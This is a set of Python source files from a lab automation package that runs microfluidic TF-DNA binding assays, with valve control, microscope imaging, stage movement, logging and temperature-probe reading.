for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['out','in'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
eh.scriptlogger.info('>> Taking postwash images')
for device, note in list(zip(deviceNames, notes)):
postwash_note = note+'_PostWash'
ic.scan(eh.rootPath, postwashExposures, device, postwash_note, eh.posLists[device], wrappingFolder=True)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.openValves([device], [competitorInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Started flowing dark competitor through devices for washout ' + str(competitorInputs))
time.sleep(washoutTime)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.closeValves([device], [competitorInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing dark competitor through devices for washout ' + str(competitorInputs))
dissociationConcurrent(deviceNames, competitorInputs, notes, points, dutyCycle, washoutTime, postwashExposures)
def runAssaywithOnOffRates(deviceNames, notes, bufferInputs, competitorInputs, points, dutyCycle, washoutTime=600, prewashExposures={'5cy5':[200, 250]}, postwashExposures={'4egfp':[500],'5cy5':[3000]}, bindingExposures={'4egfp':[500],'5cy5':[200,250]}, treeFlushTime=20, incubationTime=5400, associationCycle=2, associationPoints=30):
"""
start this script after letting DNA solubilize in reaction chamber
open buttons and begin imaging (low exposure times)
image continuously for 90 mins
close necks
take prewash image
close buttons
flow PBS for 10 min
take postwash images
flow competitor oligo, 10 min
run kinetics
"""
eh.scriptlogger.info('>> Starting TF-DNA binding assay')
# just to be safe, close everything (only necks should be open at this point)
vc.returnToSafeState(deviceNames)
# open and close buttons repeatedly to record on rate
vc.openValves(deviceNames,['b1','b2','neck'])
for i in range(associationPoints):
time.sleep(associationCycle)
vc.closeValves(deviceNames,['b1','b2'])
eh.scriptlogger.info('Taking image of TF-DNA association rate @ %d sec' % (associationCycle*(i+1)))
for device, note in list(zip(deviceNames, notes)):
associationrate_note = note+'_AssociationKinetics_'+str(i)
ic.scan(eh.rootPath, bindingExposures, device, associationrate_note, eh.posLists[device], wrappingFolder=True)
vc.openValves(deviceNames,['b1','b2'])
remainingTime = incubationTime - associationCycle*associationPoints
eh.scriptlogger.info('Letting oligo bind for %.1f minutes' % (remainingTime/60.0))
time.sleep(remainingTime)
# close neck valves and take prewash image
vc.closeValves(deviceNames,['neck'])
eh.scriptlogger.info('Finished binding, taking prewash images')
for device, note in list(zip(deviceNames, notes)):
prewash_note = note+'_PreWash'
ic.scan(eh.rootPath, prewashExposures, device, prewash_note, eh.posLists[device], wrappingFolder=True)
# close buttons, wash, and take postwash images
vc.closeValves(deviceNames,['b1','b2'])
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
eh.scriptlogger.info('>> Taking postwash images')
for device, note in list(zip(deviceNames, notes)):
postwash_note = note+'_PostWash'
ic.scan(eh.rootPath, postwashExposures, device, postwash_note, eh.posLists[device], wrappingFolder=True)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.openValves([device], [competitorInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Started flowing dark competitor through devices for washout ' + str(competitorInputs))
time.sleep(washoutTime)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.closeValves([device], [competitorInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing dark competitor through devices for washout ' + str(competitorInputs))
dissociationConcurrent(deviceNames, competitorInputs, notes, points, dutyCycle, washoutTime, postwashExposures)
## nicole's scripts:
def flowProteinStartAssaysConcurrent(deviceNames, substrateInputs, bufferInputs, notes, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800,
washoutTime = 600, postEquilibImageChanExp = {'6mCherry':[80]}, postWashImageChanExp = {'6mCherry':[1500], '4egfp':[500]}):
"""
Performs binding assay for a single protein dilution series.
Procedure:
1) Flush inlet tree
2) Flow protein onto device
3) Close sandwiches, open buttons, wait 30 min
4) Prewash mCherry imaging
5) Close buttons, wash 10 min
6) Postwash mCherry and eGFP imaging
Arguments
(list) deviceNames: list of the name of devices
        (list) substrateInputs: list of protein inputs for each device
        (list) bufferInputs: PBS inlets for both devices
        (list) notes: protein identities, in order of device name
        equilibrationTime: time (sec) for equilibrating protein on the chip, standard is 30 minutes
        treeFlushTime: time (sec) for flushing the inlet tree of protein before introducing it onto the device
        bindingTime: time (sec) for equilibrating the TF-DNA interaction
        washoutTime: time (sec) for washing buffer through after the binding measurement
        postEquilibImageChanExp: prewash mCherry image channel and exposure settings
        postWashImageChanExp: channels and exposures for postwash eGFP and mCherry imaging
"""
eh.scriptlogger.info('>> Flowing protein, starting assay for device {} in lines {}'.format(str(deviceNames), str(substrateInputs)))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for protein in {}'.format(str(substrateInputs)))
vc.returnToSafeState(deviceNames)
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.openValves([device], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for protein in ' + str(substrateInput))
#Flow protein onto device, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInputs))
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInputs))
#Close things to prep for assay, and open buttons
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.closeValves([device], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(1)
vc.openValves(deviceNames, ['b1', 'b2'])
eh.scriptlogger.info('Binding protein to buttons, no kinetics' + str(substrateInputs))
time.sleep(bindingTime)
# Obtain pre-wash mCherry no matter what
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postEquilibImageChanExp, device, note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[device], wrappingFolder = True)
    # Flush the inlet tree with wash buffer
eh.scriptlogger.info('The inlet tree wash started for buffers in ' + str(bufferInputs))
vc.returnToSafeState(deviceNames)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInputs))
# Flow buffer through chip
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['w'])
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(0.5)
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'in', 'out'])
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postWashImageChanExp, device, note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
|
FordyceLab/RunPack-STAMMP | runpack-stammp/io.py | # title : io.py
# description : Top-level classes for Jupyter-based experimental
# MicroManager imaging & WAGO valve control
# authors : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import os
import sys
import time
import json
import logging
import warnings
import pandas as pd
import visa
from acqpack import Manifold
from acqpack import utils as ut
from acqpack import gui
################################################################################
class ExperimentalHarness:
posLists = {}
valvelogger = None
scriptlogger = None
acquilogger = None
userlogger = None
rootPath = ''
config = None
experimentalDescription = ''
assayTimes = {}
imagingRecord = pd.DataFrame()
def __init__(self, root, description, loggername = 'experiment'):
"""Experimental Harness constructor
TODO: refactor as parent class
Args:
(str) root: experimental root path. Location where images will be written.
            (str) description: terse experimental description
            (str) loggername: custom name for the experimental logger. Will be
                propagated to the experimental log.
Returns:
None
"""
ExperimentalHarness.rootPath = self.root = root
ExperimentalHarness.experimentalDescription = self.description = description
time.sleep(0.2)
self.initializeLogger(loggername)
def addPositionList(self, dname, path):
"""Adds a MicroManager position list to the experimental harness
Args:
(str) dname: device name ('d1' | 'd2' | 'd3')
(str) path: path of the MicroManager position list (.pos file)
Returns:
None
"""
posList = ut.load_mm_positionlist(path)
ExperimentalHarness.posLists[dname] = posList
logging.info('Added Position List for Device {}'.format(dname))
def removePositionList(self, dname):
"""Removes a MicroManager position list from the experimental harness
Args:
(str) dname: device name for harness to remove ('d1' | 'd2' | 'd3')
Returns:
None
"""
ExperimentalHarness.posLists.pop(dname)
        logging.info('Removed Position List for Device {}'.format(dname))
def note(self, note, importance = 0):
"""Writes a custom note to the user logger of the given importance
Args:
            (str) note: note text to write to the user log
(int) importance: logging level. 0 = 'info', 1 = 'warning',
2 = 'error', 3 = 'critical' (0 | 1 | 2 | 3)
Returns:
None
"""
if importance == 1:
ExperimentalHarness.userlogger.warning(note)
elif importance == 2:
ExperimentalHarness.userlogger.error(note)
elif importance == 3:
ExperimentalHarness.userlogger.critical(note)
else:
ExperimentalHarness.userlogger.info(note)
def initializeLogger(self, name):
"""Initializes the loggers
These loggers include a valve logger, script logger, acquisition
logger, and user logger.
Args:
(str) name: log file name
Return:
None
"""
logging.basicConfig(level=logging.INFO,
format = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt = '%y-%m-%d %H:%M:%S',
filename = os.path.join(self.root, '{}.log'.format(name)),
filemode = 'a+')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s', '%y-%m-%d %H:%M:%S')
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logging.captureWarnings(True)
ExperimentalHarness.valvelogger = logging.getLogger('Valves')
ExperimentalHarness.scriptlogger = logging.getLogger('Script')
ExperimentalHarness.acquilogger = logging.getLogger('Acquisition')
ExperimentalHarness.userlogger = logging.getLogger('User')
def addAssayTimings(self, assayTimesDict):
"""Adds a dictionary of assay kinetic delay timings to the experimental harness.
Args:
            (dict) assayTimesDict: dictionary of assay timings of the form
                {'name': [dt0, dt1, ..., dtf], ...}
Returns:
None
"""
for key in assayTimesDict.keys():
warnMsg = 'Harness already contained the assay time key: {}'.format(key)
if key in ExperimentalHarness.assayTimes.keys():
logging.warning(warnMsg)
ExperimentalHarness.assayTimes.update(assayTimesDict)
logging.info('Updated harness with assay times: {}'.format(assayTimesDict))
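    # Hedged usage sketch (hypothetical root path and timing values): kinetic
    # delay lists are keyed by assay name and shared class-wide via
    # ExperimentalHarness.assayTimes.
    #
    # harness = ExperimentalHarness('D:/data/run01', 'test run')
    # harness.addAssayTimings({'kinetics_fast': [0, 30, 60, 120, 300]})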
def removeAssayTimings(self, assayTimesKeys):
"""Removes a list of assay timings from the experimental harness
Args:
            (list) assayTimesKeys: list of assay timing keys to remove from
                the experimental harness
Returns:
None
"""
try:
list(map(ExperimentalHarness.assayTimes.pop, assayTimesKeys))
logging.info('Removed assay times from harness: {}'.format(assayTimesKeys))
        except KeyError as e:
            offendingKey = e.args[0]
            errornote = 'Time list not present: {}'.format(offendingKey)
            # warnings.warn returns None and `note` was undefined here; warn
            # with the constructed message instead of raising it.
            warnings.warn(errornote)
def toString(self):
"""A string description of the ExperimentalHarness
Args:
None
Returns:
            str: description of the experimental harness state
"""
stringVals = {'rp': ExperimentalHarness.rootPath,
'ed': ExperimentalHarness.experimentalDescription,
'pl': ExperimentalHarness.posLists.keys(),
'at': ExperimentalHarness.assayTimes
}
        return 'Experimental Harness Current State: \n\
        Root Path: {rp}\n\
        Experimental Description: {ed}\n\
        Position Lists: {pl}\n\
        Assay Timings: {at}'.format(**stringVals)
    def __del__(self):
        # Detach, flush, and close all root-logger handlers; the original used
        # the nonexistent module-level logging.removeHandler and the private
        # logging._handlers.
        root = logging.getLogger('')
        for handler in list(root.handlers):
            root.removeHandler(handler)
            handler.flush()
            handler.close()
class HardwareInterface:
config = None
mmcfg = None
mm_version = None
setup = None
valvemapPath = None
manifoldAddress = None
manifoldOffset = None
channels = None
filterBlockName = None
valves = None
coreTimeout = 20000 #ms
core = None #MM core
temp = None #temperature & humidity probe
m = None #manifold
flowValves = None
controlValves = None
valveReferenceIndex = 'chip'
def __init__(self, loadAllHardware = True, configLoc = ''):
"""Hardware interface for control of camera/microscope, valving,
and sensors
TODO: refactor as parent class
Args:
(bool) loadAllHardware: flag to load all hardware available
(str) configLog: path of JSON configuration file
Returns:
None
"""
self.loadConfig(configLoc)
if loadAllHardware:
self.initializeHardware()
else:
logging.info('HardwareInterface Created. Add Hardware to Interface.')
logging.info('Experimental Description: {}'.format(
ExperimentalHarness.experimentalDescription)
)
def initializeHardware(self, subset = 'all'):
"""Initializes control of the hardware by adding it to the hardware interface.
Possible subsets are 'all', 'manifold', 'microscope', and 'temperature'.
Args:
subset (str): subset of hardware to initialize ('all' | 'manifold'
| 'microscope' | 'temperature'.)
Returns:
None
"""
if subset == 'all':
            self.initializeManifoldControl()
self.initializeMicroManager()
self.initializeTempProbe()
elif subset == 'manifold':
            self.initializeManifoldControl()
elif subset == 'microscope':
self.initializeMicroManager()
elif subset == 'temperature':
self.initializeTempProbe()
elif subset is None:
warnings.warn('No hardware was selected to initialize')
else:
raise ValueError('The requested hardware initialization failed. \
Specify a valid subset.')
    def initializeManifoldControl(self):
"""Initialize connection to WAGO controller and manifold.
Args:
None
Returns:
None
"""
hi = HardwareInterface
HardwareInterface.m = Manifold(hi.manifoldAddress,
str(hi.valvemapPath),
hi.manifoldOffset)
HardwareInterface.m.valvemap.fillna('', inplace=True)
self.assignValvetypes()
logging.info('Manifold Control Established')
def assignValvetypes(self):
"""Assigns valves in the valvemap to type 'flow' or 'control' and adds to HardwareInterface.
Args:
None
Returns:
None
"""
valves = HardwareInterface.m.valvemap.copy().dropna()
device = valves['device'].drop_duplicates().tolist()[0]
valves['chipshort'] = valves.chip.apply(lambda v: v[:-1]) # Shorthand valve notation
HardwareInterface.flowValves = valves.loc[valves.layer == 'flow'].chipshort.drop_duplicates().tolist()
HardwareInterface.controlValves = valves.loc[valves.layer == 'control'].chipshort.drop_duplicates().tolist()
def initializeMicroManager(self):
"""Instantiates a MMCore instance
Args:
None
Returns:
None
"""
logging.info('Trying to Establish Microscope Control...')
sys.path.insert(0, HardwareInterface.mm_version) # make it so python can find MMCorePy
import MMCorePy
HardwareInterface.core = MMCorePy.CMMCore()
HardwareInterface.core.loadSystemConfiguration(str(HardwareInterface.mmcfg))
HardwareInterface.core.setTimeoutMs(HardwareInterface.coreTimeout)
logging.info('Microscope Control Established')
defaults = self.config['mm']['defaults']
self.setScopeConfig(exposure = defaults['exposure'], binning = defaults['binning'])
def initializeTempProbe(self):
"""Initializes connection to the temperature probe
Args:
None
Returns:
None
"""
th = HardwareInterface.config['temp_hum']
HardwareInterface.temp = TemperatureProbe(th['vid'], th['pid'])
HardwareInterface.temp.load()
logging.info('Temperature and Humidity Probe Connected')
def setScopeConfig(self, exposure = None, binning = None, channel = None):
"""Sets the camera configuration to the specified exposure, binning, and channel
Args:
exposure (int): camera exposure time (ms)
binning (str): camera binning ('1x1' | '2x2' | '3x3' | '4x4 | '6x6')
channel (str): camera channel, as per Channel preset group
defaults: 1pbp, 2bf, 3dapi, 4egfp, 5cy5
Returns:
None
"""
if exposure:
HardwareInterface.core.setProperty(HardwareInterface.core.getCameraDevice(),
"Exposure",
exposure)
logging.info('Camera Exposure Set: {}ms'.format(exposure))
if binning:
HardwareInterface.core.setProperty(HardwareInterface.core.getCameraDevice(),
"Binning",
str(binning))
logging.info('Camera Binning Set: {}'.format(binning))
if channel:
HardwareInterface.core.setConfig('Channel', str(channel))
logging.info('Camera Channel Set: {}'.format(channel))
# HardwareInterface.core.waitForDevice(HardwareInterface.filterBlockName)
HardwareInterface.core.waitForSystem()
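    # Hedged usage sketch (hypothetical config path): exposure in ms, binning
    # as a preset string, and channel as a Channel preset-group name (default
    # channel names are listed in the docstring above).
    #
    # interface = HardwareInterface(loadAllHardware=True, configLoc='config.json')
    # interface.setScopeConfig(exposure=100, binning='2x2', channel='4egfp')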
def unloadHardware(self):
"""Unloads all hardware from the HardwareInterface
Args:
None
Returns:
None
"""
try:
HardwareInterface.m.exit()
logging.info('Manifold Control Unloaded')
except Exception:
warnings.warn('Could Not Unload Manifold')
pass
try:
HardwareInterface.core.unloadAllDevices()
logging.info('MicroManager Core Unloaded')
HardwareInterface.core.reset()
logging.info('MicroManager Core Reset')
except Exception:
warnings.warn('Could Not Unload Micromanager')
pass
try:
del(HardwareInterface.temp)
logging.info('Temperature Probe Disconnected')
except Exception:
warnings.warn('Could Not Disconnect Temp/Hum Probe')
pass
def loadConfig(self, c):
"""Loads a JSON experimental configuration.
Experimental configuration specifies hardware details and
ExperimentalHarness initial values.
Args:
c (str): config path
Returns:
None
"""
with open(c) as config_source:
HardwareInterface.config = json.load(config_source)['Hardware']
with open(c) as config_source:
ExperimentalHarness.config = json.load(config_source)['Software']
hc = HardwareInterface.config
mm = hc['mm']
wago = hc['wago']
th = hc['temp_hum']
HardwareInterface.mm_version = mm['version']
HardwareInterface.mmcfg = mm['config_loc']
HardwareInterface.setup = str(hc['setup_id'])
HardwareInterface.coreTimeout = int(mm['core_timeout'])
HardwareInterface.valvemapPath = str(wago['valvemap_path'])
HardwareInterface.manifoldAddress = wago['address']
HardwareInterface.manifoldOffset = wago['offset']
HardwareInterface.filterBlockName = mm['filterblock_name']
HardwareInterface.channels = [str(c) for c in mm['channels']]
at = {str(k):v for k, v in ExperimentalHarness.config['assay_timings'].items()}
ExperimentalHarness.assayTimes = at
def toString(self):
"""A string description of the HardwareInterface
Args:
None
Returns:
str: Description of the experimental harness description
"""
stringVals = {'vm': HardwareInterface.valvemapPath,
'ma': HardwareInterface.manifoldAddress,
'mmv': HardwareInterface.mm_version,
'mmc': HardwareInterface.mmcfg,
'f': HardwareInterface.channels}
return 'Hardware Interface Current State: \n\
Valvemap Path: {vm}\n\
Manifold Address Path: {ma}\n\
MicroManager Version: {mmv}\n\
MicroManager Config: {mmc}\n\
Filters: {f}\n'.format(**stringVals)
def __del__(self):
self.unloadHardware()
class TemperatureProbe:
def __init__(self, vid = '0x1313', pid = '0x80F8'):
"""Temperature Probe object for connection and query of Thorlabs TSP01
Args:
vid (str): Vendor ID (hex)
pid (str): Product ID (hex)
Returns:
None
"""
self.vid = vid
self.pid = pid
self.rm = visa.ResourceManager() #pyvisa
def load(self):
"""
Opens Thorlabs TSP01 temperature/humidity probe as pyvisa resource
Args:
None
Returns:
None
"""
        for device in self.listVISAResources():
            if self.vid in device and self.pid in device:
                try:
                    self.inst = self.rm.open_resource(str(device))
                    break  # stop at the first matching probe
                except Exception:
                    raise IOError('Connection to probe could not be established')
def getDeviceInfo(self):
"""Queries probe IDN
Args:
None
Returns:
dict: A dictionary of device ID fields to values
"""
fields = ['Model', 'SerialNo', 'FirmwareRev']
return dict(zip(fields, self.inst.query('*IDN?').split(',')))
def listVISAResources(self):
"""Lists available VISA resources
Args:
None
Returns:
list: Connected VISA resources
"""
return self.rm.list_resources()
def getOnboardTemp(self):
"""Query and return onboard temperature (celcius)
Args:
None
Return:
float: Onboard temperature (celcius)
"""
try:
temp = float(self.inst.query('SENS1:TEMP:DATA?'))
except:
warnings.warn('Could not read onboard probe temperature')
temp = 999.9
return temp
def getProbeTemp(self):
"""Query and return outboard temperature (celcius)
Args:
None
Return:
float: Outboard temperature (celcius)
"""
try:
temp = float(self.inst.query('SENS3:TEMP:DATA?'))
except:
warnings.warn('Could not read outboard probe temperature')
temp = 999.9
return temp
def getHumidity(self):
"""Query and return onboard humidity (realtive %)
Args:
None
Return:
float: Onboard humidity (%)
"""
try:
hum = float(self.inst.query('SENS2:HUM:DATA?'))
except:
warnings.warn('Could not read probe humidity')
hum = 999.9
return hum
def launchGUI(self, static_window = None):
"""TODO: Implement Jupyter widget for real-time temperature/humidity
"""
raise NotImplementedError('Real time temperature gui not implemented')
    def __del__(self):
        # Guard: self.inst exists only if load() succeeded.
        if hasattr(self, 'inst'):
            self.inst.close()
        self.rm.close() |
FordyceLab/RunPack-STAMMP | runpack-stammp/imagingcontrol.py | # title : imagingcontrol.py
# description : Imaging and stage control for RunPack experiments
# authors : <NAME>, <NAME>
# credits :
# date : 20180520
# version update : 20200913
# version : 0.1.1
# usage : With permission from DM
# python_version : 2.7
import os
import time
import datetime
import numpy as np
import pandas as pd
from PIL import Image
from Queue import Queue
import matplotlib.pyplot as pl
from acqpack import gui
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
hardwareQueue = Queue()
hardwareBlockingFlag = True
hardwareState = 0 #State: 0 = Resting, 1 = One Queue Complete, 2 = Both Complete
def snap(show = True, vmin = 0, vmax = 65535, figsize = (4, 4)):
"""Snaps an image and returns the resulting image array.
Args:
        show (bool): flag to show the image
        vmin (int): display threshold minimum
        vmax (int): display threshold maximum
        figsize (tuple): matplotlib figure size
    Returns:
        np.ndarray: the snapped image as a 2D array
"""
hi.core.snapImage()
imgArr = hi.core.getImage()
if show:
pl.figure(figsize = figsize)
pl.imshow(imgArr, cmap='gray', vmin = vmin, vmax = vmax)
        pl.title('Snapped Image, {}'.format(time.strftime("%Y%m%d-%H%M%S", time.localtime())))
pl.axis('off')
pl.show()
return imgArr
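# Hedged usage sketch: grab a frame without displaying it, then inspect it.
#
# img = snap(show=False)
# print(img.shape, img.dtype)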
def live():
"""Wrapper for acqpack.gui.video() video acquisition function.
TODO: Enable live video saving to disk
Args:
None
Returns:
None
"""
gui.video(hi.core, loop_pause=0.05)
def startHardwareQueue():
"""Start the hardware job queue
Args:
None
Returns:
None
"""
eh.acquilogger.info('HardwareQueue Started')
while hardwareState < 2:
args, kwargs = hardwareQueue.get(block = hardwareBlockingFlag)
scan(*args, **kwargs)
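# Hedged usage sketch: queued jobs are (args, kwargs) tuples consumed as
# scan(*args, **kwargs). The position list and channel/exposure dict below
# are illustrative.
#
# hardwareQueue.put(((eh.rootPath, {'5cy5': [100]}, 'd1', 'test scan', posList),
#                    {'wrappingFolder': True}))
# startHardwareQueue()  # blocks, consuming jobs until hardwareState >= 2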
def get_stage_position():
"""
TODO: Implement getting current stage position
"""
raise NotImplementedError('Fetching stage position not yet implemented.')
def move_stage_custom(x, y, z):
"""Immediately move the stage to a custom (x, y, z) position
Args:
(float) x: target stage x coordinate
(float) y: target stage y coordinate
(float) z: target stage z coordinate
Returns:
None
"""
hi.core.setXYPosition(x,y)
hi.core.waitForDevice(hi.core.getXYStageDevice())
hi.core.setPosition(hi.core.getFocusDevice(), z)
hi.core.waitForDevice(hi.core.getFocusDevice())
def move_stage_poslist(position_list, poslistIndex, zControl = True):
"""Move the xy(z) stage to cooredinates specified by the ith
entry in the position list. It is likely that you want to position list
in sorted order.
Args:
position_list (pd.DataFrame): stage xy(z) position list. z position
is not required. The default behavior is to move to z if present
poslistIndex (int): row index of position list to move to
zControl (bool): flag to move to home z position or retain current z
Returns:
None
"""
x,y = position_list[['x','y']].iloc[poslistIndex]
hi.core.setXYPosition(x,y)
hi.core.waitForDevice(hi.core.getXYStageDevice())
if ('z' in position_list.columns) and zControl:
z = position_list[['z']].iloc[poslistIndex]
hi.core.setPosition(hi.core.getFocusDevice(), z)
hi.core.waitForDevice(hi.core.getFocusDevice())
def home_stage(position_list, zControl = True):
"""Brings the stage to its initial pinlist position
Args:
position_list (pd.DataFrame): xy-stage or xyz-stage position list
zControl (bool): flag to move to home z position or retain current z
Returns:
None
"""
move_stage_poslist(position_list, 0, zControl = zControl)
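# Hedged usage sketch: position lists are pandas DataFrames with 'x', 'y',
# optional 'z', and 'name' columns (as loaded by acqpack's
# load_mm_positionlist); the coordinate values below are illustrative.
#
# import pandas as pd
# posList = pd.DataFrame({'name': ['p0', 'p1'],
#                         'x': [0.0, 1500.0],
#                         'y': [0.0, 0.0],
#                         'z': [10.0, 10.2]})
# move_stage_poslist(posList, 1)   # go to 'p1'
# home_stage(posList)              # return to 'p0'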
def scan(data_dir, channelsExposures, dname, note, position_list,
wrappingFolder = False, write_imaging_record = True,
return_imaging_record = False, zControl = True):
"""Rastered image acquisition.
    Acquires images in a raster pattern and saves the results.
Writes metadata to the acquired images.
Args:
data_dir (str): root directory of image acquisitions
channelsExposure (dict): Dictionary of channels mapped to exposures
(e.g., {'2bf':[50, 500], '1pbp':[100, 200]})
dname (str): device name ('d1' | 'd2' |'d3')
note (str): Scan note, to be used in the image filename
position_list (pd.DataFrame): stage xy(z) position list
wrappingFolder (bool): flag to wrap acquistions inside another
directory of name notes
zControl (bool): flag to move to home z position or retain current z
Returns:
(pd.DataFrame | None): Pandas dataframe with a summary of the image raster
"""
def makeDir(path):
if not os.path.isdir(path):
os.makedirs(path)
messageItems = [str(dname), str(channelsExposures), str(note.replace(' ', '_'))]
startMessage = 'Started Scan of {}, channelsExposures = {}, note = {}'.format(*messageItems)
eh.acquilogger.info(startMessage)
if wrappingFolder:
timeString = time.strftime("%Y%m%d-%H%M%S", time.localtime())
scanfolder = (os.path.join(data_dir, '{}-{}_{}'.format(timeString, dname, note.replace(' ', '_'))))
data_dir = scanfolder
makeDir(scanfolder)
scanDirs = {}
startTime = time.strftime("%Y%m%d-%H%M%S", time.localtime())
for channel in channelsExposures.keys():
scan_dir = '{}_{}_{}'.format(startTime, note.replace(' ', '_'), channel)
scanDirs[channel] = scan_dir
outDir = os.path.join(data_dir, channel, scan_dir)
makeDir(outDir)
if hi.temp:
temp = hi.temp.getProbeTemp() # Get temperature for metadata
hum = hi.temp.getHumidity() # Get humidity for metadata
else:
temp = 999.9
hum = 999.9
scanRecord = []
for i in xrange(len(position_list)):
move_stage_poslist(position_list, i, zControl)
x,y = position_list[['x','y']].iloc[i]
for channel in channelsExposures.keys():
hi.core.setConfig('Channel', channel)
hi.core.waitForSystem()
timestamp = time.strftime("%Y%m%d-%H%M%S", time.localtime())
for exposure in channelsExposures[channel]:
hi.core.setProperty(hi.core.getCameraDevice(), 'Exposure', exposure)
hi.core.waitForDevice(hi.core.getCameraDevice())
hi.core.snapImage()
img = hi.core.getImage()
image = Image.fromarray(img)
timestamp = time.strftime("%Y%m%d-%H%M%S", time.localtime())
positionname = position_list['name'].iloc[i]
outPath = os.path.join(data_dir, channel, scanDirs[channel])
                frameName = '{}_{}.tif'.format(positionname, exposure)
                imagePath = os.path.join(outPath, frameName)
summary = 'Device: {}, Note: {}, ExpDescription: {}'.format('Setup 3', note, eh.experimentalDescription)
frameInfo = '{{Channel: {}, Index:{}, Pos:({},{})}}'.format(channel, i, x, y)
frameTime = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
recordLabels = ['raster_start_time', 'scan_params', 'channel',
'exposure_ms', 'image_path', 'raster_index',
'x', 'y', 'dname', 'frame_time', 'temperature',
'humidity', 'note','setup', 'experimental_desc']
recordFeatures = [startTime, channelsExposures, channel, exposure,
imagePath, i, x, y, dname, frameTime, temp,
hum, note, hi.setup,
eh.experimentalDescription]
scanRecord.append(dict(zip(recordLabels, recordFeatures)))
exifIDs = [37888, 37889, 33434, 37510, 270, 306]
exifValues = [temp, hum, exposure/1000.0, summary, frameInfo, frameTime]
tags = dict(zip(exifIDs, exifValues))
image.save(imagePath, tiffinfo = tags)
messageItems = str(dname), str(channelsExposures), str(note.replace(" ", "_"))
endMessage = 'Completed Scan of {}, channelsExposures = {}, note = {}'.format(*messageItems)
eh.acquilogger.info(endMessage)
home_stage(position_list, zControl = zControl)
scanRecordDF = pd.DataFrame(scanRecord)
if write_imaging_record:
imageRecordsPath = os.path.join(eh.rootPath, 'imaging.csv')
imageRecordExists = os.path.isfile(imageRecordsPath)
with open(imageRecordsPath, 'a+') as ir:
if imageRecordExists:
scanRecordDF.to_csv(ir, header=False)
else:
scanRecordDF.to_csv(ir, header=True)
if return_imaging_record:
return scanRecordDF
class KineticAcquisition():
def __init__(self, deviceName, channelsExposures, delayTimes, description):
self.device = deviceName #either d1, d2, or d1d2
self.channelsExposures = channelsExposures # dict
self.delayTimes = delayTimes #as a tuple
self.absTimes = self.getTimeSpacings()
self.note = description.replace(" ", "_")
def getTimeSpacings(self):
"""
Given a list of delay times (in seconds), calculates the summed time elapsed from a reference time.
Args:
None
Returns:
list: List of summed delays from a common reference time (0)
"""
        referencedDelayTimes = [0] + list(self.delayTimes)
return np.cumsum(referencedDelayTimes).tolist()
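    # Hedged example (added; not in the original source): with
    # delayTimes = [60, 120, 300], getTimeSpacings() returns [0, 60, 180, 480],
    # i.e. cumulative offsets from the first scan at t = 0.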
def __str__(self):
"""Prints and returns a string representation of the kinetic acquisition parameters.
Args:
None
Returns:
str: KineticAcquisition parameters
"""
paramVals = [self.device,
self.channelsExposures,
str(self.absTimes),
str(self.delayTimes),
self.note]
params = 'Device Name: {}, Channels, Exposures: {}, \
